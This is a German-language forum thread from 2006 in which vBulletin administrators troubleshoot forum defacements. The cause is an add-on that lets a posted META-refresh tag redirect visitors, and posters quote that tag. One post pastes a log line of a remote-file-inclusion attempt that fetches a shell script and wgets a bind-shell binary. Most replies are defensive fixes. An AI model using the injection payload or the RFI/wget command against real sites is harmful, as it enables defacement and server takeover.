Als ich eben auf mein Forum: http://www.schulhausmeisterforum.de geklickt habe staunte ich nicht schlecht. :( Das Board wurde heute Nacht gehackt und ich bekomme nun eine andere Seite zu sehen. :confused: Wie konnte das passieren und vor allen wie bekomme ich mein Forum wieder zum laufen. Die Datenbank scheint noch vorhanden zu sein und auf dem ftp-Server scheinen auch alle Daten noch dazu sein.

DU hast ja deinen Modcp und Admincp nicht geschützt. Das geht ganz einfach mit einer .htaccess auf deinem Unterverzeichnis.

Ich habe direkten Zugriff darauf. Das sind wieder und wieder die selben Fehler die gemacht werden.
http://www.megatr.org/forum/admincp/

Sicherlich hast du noch viele Hacks installiert? Ich kann davon nur abraten. Kein Hackprogramierer kann die Qualität liefern um die Sicherheit des Systems nach der Änderung weiterhin zu gewährleisten. Extrem wird es dann natürlich wenn mehrere Hacks installiert sind. Damit kann keiner mehr sich ergebenden Änderungen im System mehr zu überblicken. Nicht umsonst treibt vBulletin einen riesen Aufwand die Forumsoftware dicht zu bekommen.

Ich drücke dir die Daumen, dass du alles wieder schnell hinbekommst. Aber ein ist wichtig, ändere alle deine Passwörter und benutze weitere Sicherheitsmechanismen wie Zertifikate und SSH um in Zukunft auf deinen Server zu gelangen.

Viele Grüße
Eric

Auf jeden Fall wurde wohl nur eine Umleitung durchgeführt.
Lade die index.php hoch und überprüfe die Templates.

Welche vB-Version hast du denn?

also wie ich geade bemerkt habe komme ich auf die forenbeiträge:

http://www.schulhausmeisterforum.de/showthread.php?t=611

irgendwie wird nur die index.php umgeleitet....

DU hast ja deinen Modcp und Admincp nicht geschützt.

wie genau muss ich denn da vorgehen?

Der "Statistiken - Top 5" - Hack läßt ungefiltert HTML zu und somit auch eine Umleitung mittels META-Tag. Du solltest den unbedingt deinstallieren.

Hier mal die entsprechende Zeile, die das verdeutlicht.

<a href="showthread.php?goto=newpost&amp;t=625" title="Zum ersten ungelesenen Beitrag im Thema '">"">>>><meta http-equiv="Refresh" content="0;url=http://www.megatr.org/hacked/">""""' gehen">">"">>>><meta...</a>

Und hier der passende Thread: http://www.schulhausmeisterforum.de/showthread.php?t=625

also ins acp komme ich auch. in der kontrollzentrum-log-anzeige konnte ich auch nichts finden ....

ich nutze version 3.5

Der "Statistiken - Top 5" - Hack läßt ungefiltert HTML zu und somit auch eine Umleitung mittels META-Tag. Du solltest den unbedingt deinstallieren.

Hier mal die entsprechende Zeile, die das verdeutlicht.

<a href="showthread.php?goto=newpost&amp;t=625" title="Zum ersten ungelesenen Beitrag im Thema '">"">>>><meta http-equiv="Refresh" content="0;url=http://www.megatr.org/hacked/">""""' gehen">">"">>>><meta...</a>

Und hier der passende Thread: http://www.schulhausmeisterforum.de/showthread.php?t=625

das war es! danke!
http://www.schulhausmeisterforum.de/showthread.php?t=625 dieses posting hatte es aus gelöst :(

we kann man sich vor soetwas schützen?

we kann man sich vor soetwas schützen?

Keine Hacks installieren?

EDIT: BTW: http://www.vbulletin.com/forum/showthread.php?p=1203109#post1203109 ;)

Handelt es sich um diese Stats?
http://www.vbulletin.org/forum/showthread.php?t=122986&page=5

da gabs wohl gestern ein security fix

Webhostlist (http://forum.webhostlist.de) hatte das heute morgen auch.. ;)

http://hollii.de/blog/webhostlist-forum-gehackt

Ich dachte zuerst, das es an vbseo liegt..

und wenn man mit der BAdword Liste arbeitet und einfach "http-equiv" dort verbietet?

Wie ich sehe funzt das auch so
Einfach
">"">>>><meta http-equiv="Refresh" in die Badwordliste schreiben und das Weiterleiten klappt so nicht mehr.

hi
der top 5 hack taucht immer mal wieder auf bei sicherheitsbedenken
reicht es erstmal aus den zu deaktivieren oder besser sofort zu deinstalieren

was ganz wichitges dazu
wie schütze ich as acz mit einer .haass (?)

gruß jo

wie schütze ich as acz mit einer .haass (?):confused: :confused:

Wenn ich richtig interpretiere meinst du folgendes? Wie schütze ich das AdminCP mit .htaccess?

Such mal ;)

http://www.vbulletin-germany.com/forum/search.php

Suchbegriff: htaccess
oder: admincp schützen
oder: verzeichnisschutz

Alternativ 'das' Google fragen bezüglich .htaccess. :)

:confused: :confused:

Wenn ich richtig interpretiere meinst du folgendes? Wie schütze ich das AdminCP mit .htaccess?

Such mal ;)

http://www.vbulletin-germany.com/forum/search.php

Suchbegriff: htaccess
oder: admincp schützen
oder: verzeichnisschutz

Alternativ 'das' Google fragen bezüglich .htaccess. :)

mal ne ganz dumme Frage!?

Wie schütze ich die AdminCp???

Mein Forum wurde vor 2 Wochen 2x gehackt und ich hatte nur noch türkische Fahenen in den ganzen index.php´s ...

wie es den Anschein hat, spielt meine membermap dabei eine Rolle. Habe das ganze forum auf einen neuen server verschoben. Nun habe ich ca. 3000 Anfragen auf die membermap-auto.php, die aber nicht mehr existiert!

Die "Statistik Top 5" habe/hatte ich auch installiert :(

Gruß

Mich hat es gestern auch getroffen, doch Dank Hilfe meines Foren-Schutzengels konnte ich handeln.

Ich habe die Topstats deinstalliert und den Code-Schnipsel auf die Bad-Word-Liste aufgenommen.

Gerade eben meldete mir mein VB, einen Datenbankfehler, und siehe der Referr-Link weißt auf ein türkisches Google hin, mit dem Suchbegriff "/forum/topXstats.php"


Datenbankfehler in vBulletin 3.5.4:
Invalid SQL:
SELECT userid, usergroupid, IF(displaygroupid=0, usergroupid, displaygroupid) AS displaygroupid, username, posts FROM user ORDER BY posts DESC LIMIT 0,;
MySQL-Fehler : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Fehler-Nr. : 1064
Datum : Sunday, September 3rd 2006 @ 12:04:00 PM
Skript : http://www.XXXXXXX/XXXXX/topXstats.php (http://www.XXXXXXX/XXXXX/topXstats.php)
Referrer : http://www.google.com.tr/search?q=/forum/topXstats.php&hl=tr&lr=&start=70&sa=N (http://www.google.com.tr/search?q=/forum/topXstats.php&hl=tr&lr=&start=70&sa=N)
IP-Adresse : 88.233.136.252
Benutzername : Unregistriert
Klassenname : vb_database


Mann, müssen die Jungs Zeit haben ... :rolleyes:

die wollten es auch bei mir versuchen
ich habe auch den top5 ... nun deinstaliert
die anmeldedaten waren
E-Mail-Adresse: seaLscr3aM@gmail.com
Geburtstag:
Referrer: -
IP-Adresse: 88.233.136.252

Mein Buggy : sadasd
PLZ im Profil : xxxxx

gruß jo

Mann, müssen die Jungs Zeit haben ... :rolleyes:

Diesmal wurde wohl vorwiegend die Schweiz (http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,iskorpitx/page,1) abgegrast ....

Wir wurden gerade eben auch gehackt:

http://german-inc.com/forum/index.php

Nach dem normalen Login erfolgt eine Weiterleitung auf:
http://www.konmp3.net/hck/

Folgender Nutzer war es bei uns:
User: MAFIA
Mochaccinoxx@hotmail.com
IP: 88.224.190.130

Ich versuche jetzt mal den TOP5 Hack zu deinstallieren!

//EDIT
Der Top5 Hack war dran schuld! Nun funktioniert wieder alles!

hi
sollte man die
@hotmail sperren?
oder haben da auch viele deutsche user ihre email adresse?
gruß jo

bringt nix, die kommen mit den verschiedensten emails rein.

Hmmm... ja ich denke auch nicht, dass es was bringt, wenn man bestimmte Mailhoster blockiert.

Bei hushmail.com bekommt man beispielsweise schneller und unkomplizierter einen Mail-Account als bei hotmail.com :D

Habt jemand den TOP5 Coder bereits darüber in Kenntnis gesetzt? Das sollten wir schnellst möglich machen, bevor es noch weitere Opfer gibt.

Screen: http://img453.imageshack.us/img453/6726/screenaa4.gif

Danke für die Hilfe!

MfG
bigM

Also ich habe die Aktuelle Englische version installiert und jetzt habe ich das Problem nimmer.

Im ersten Moment war ich eigentlich doch geschockt aber gott sei Dank habe ich den Fehler schnell behoben dank hilfe hier aus dem Forum

hi
sollte man die
@hotmail sperren?
oder haben da auch viele deutsche user ihre email adresse?
gruß jo

Hehe, ich hab auch noch ein paar Hotmail-Addies im Umlauf. Die eine schon seit 1999. Immerhin ist hotmail von M$. ;)

Ich hatte heute Nacht wieder einen "Angriff". Leider hab ich die Daten nicht aufgeschrieben, sondern einfach das Gelumpe gelöscht, egal.

Da ich ja gestern die Topstats gelöscht habe, scheint es diesmal das Flashchat-Modul gewesen zu sein. Leider habe ich ausgerechnet heute abend einen großen Themenchat, den ich ungern absagen möchte. Werde also unvorsichtiger Weise erst morgen auch hier die neue Version aufspielen.

Auswirkungen hatte die nächtliche Aktion keine, der Bad-Word-Filter hat zugeschlagen und den Weiterleitungscode mit *** versehen :p

kann mir mal jemand nen Link zu der aktuellen Version der ToP 5 Statistik zukommen lassen. Ich finde die irgendwie nicht.

Wir wurden gerade eben auch gehackt:

http://german-inc.com/forum/index.php

Nach dem normalen Login erfolgt eine Weiterleitung auf:
http://www.konmp3.net/hck/

Folgender Nutzer war es bei uns:
User: MAFIA
Mochaccinoxx@hotmail.com
IP: 88.224.190.130


So einer war bei mir gestern auch wieder aktiv :(
gleiche IP wie Du geschrieben hast und zusätzlich

User: ScRea_M
IP: 88.229.47.109

kamen beide über NewYork aus der Türkei.

Der Hat diesen komischen Text ca. 15x gepostet. Stand so in den Threads.
Was macht das Script? Mein Forum läuft noch. Hat sich da jetzt was in die DB geschrieben?

nein die Datenbank sollte bis auf den reinen Text unberührt sein.
Er löst damit nur eine Weiterleitung aus. Nervt zwar, aber nicht wirklich gefährlich.

Ich habe jetzt NOSPAM den hack eingebaut. Beim Anmelden muss zusätzlich zum Captcha eine Frage beantwortet werden.

Damit stelle ich siche, dass der User deutsch kann und dass er sich das Forum zumindest angesehen hat.

kam gerade von meinem hoster
habe sofort den flashchat gelöscht
Hier der Aufruf:

213.169.107.61 - - [04/Sep/2006:14:06:54 +0200] "GET /forum/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://mescali
n.v10.com.br/shell.txt?&cmd=cd%20/tmp;wget%20http://home.pages.at/packetkid/bindit HTTP/1.0" 200 6005 "-"
"Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"

@admins wenn da was "gefährliches " zu lesen ist dann bitte löschen
gruß jo

.. und hier bei user online
Aufenthaltsort unbekannt
/forum/index.php/chat/archive/chat/inc/cmses/aedating4CMS.php?dir[inc]=http://en.gov.ua/downloads/uploads/rfispmy.txt?

chat kompl. gelöscht inkl. den ganzen ordner
und nu?
gruß jo

und nu?

Einfach nur weiterleben? :confused:

AFAIK gibt es für den Chat einen Patch.

hi
äääähhhh ist das nun "gefahr" oder nicht sind dauernd drin
gruß jo

Wenn der Chat wech ist, gibt es keine Gefahr.

ahh
jetzt habe ichs kapiert die würden gerne wenn das noch da wäre! :-)
jo

Also ich habe die Aktuelle Englische version installiert und jetzt habe ich das Problem nimmer.

Im ersten Moment war ich eigentlich doch geschockt aber gott sei Dank habe ich den Fehler schnell behoben dank hilfe hier aus dem Forum

Hallo, auch ich habe nun diese gefixte englische Version, nun wollte ich die englischen Bezeichnungen "Last Posters, Newest Members..." usw. ins deutsche ändern. Finde aber nicht wo das zu tun ist, hast du eine Idee?

P.S.: Der Fix funktioniert wirklich, aber leider gibt es noch immer viele Registrierungen und Weiterleitungs-Posts, die dann halt nur nicht mehr funktionieren.

Hallo, auch ich habe nun diese gefixte englische Version, nun wollte ich die englischen Bezeichnungen "Last Posters, Newest Members..." usw. ins deutsche ändern. Finde aber nicht wo das zu tun ist, hast du eine Idee?

P.S.: Der Fix funktioniert wirklich, aber leider gibt es noch immer viele Registrierungen und Weiterleitungs-Posts, die dann halt nur nicht mehr funktionieren.

aber leider gibt es noch immer viele Registrierungen (http://www.vbhacks-germany.com/forum/showthread.php?t=5159)und Weiterleitungs-Posts (http://www.vbhacks-germany.com/forum/showthread.php?p=41585#post41585)

für beides gibt ja schon effiziente Lösungen.

der nospam Hack schafft abhilfe, denn da registrieren sich nur Leute, die wirklich Interesse haben.

User: MAFIA
Mochaccinoxx@hotmail.com
IP: 88.224.190.130

Ich versuc


User: ScRea_M
IP: 88.229.47.109


Man kann es gar nicht oft genug sagen: Turk Telekom komplett aussperren und Ruhe ist: http://blog.webgurus.de/index.php?serendipity%5Baction%5D=search&serendipity%5BsearchTerm%5D=turk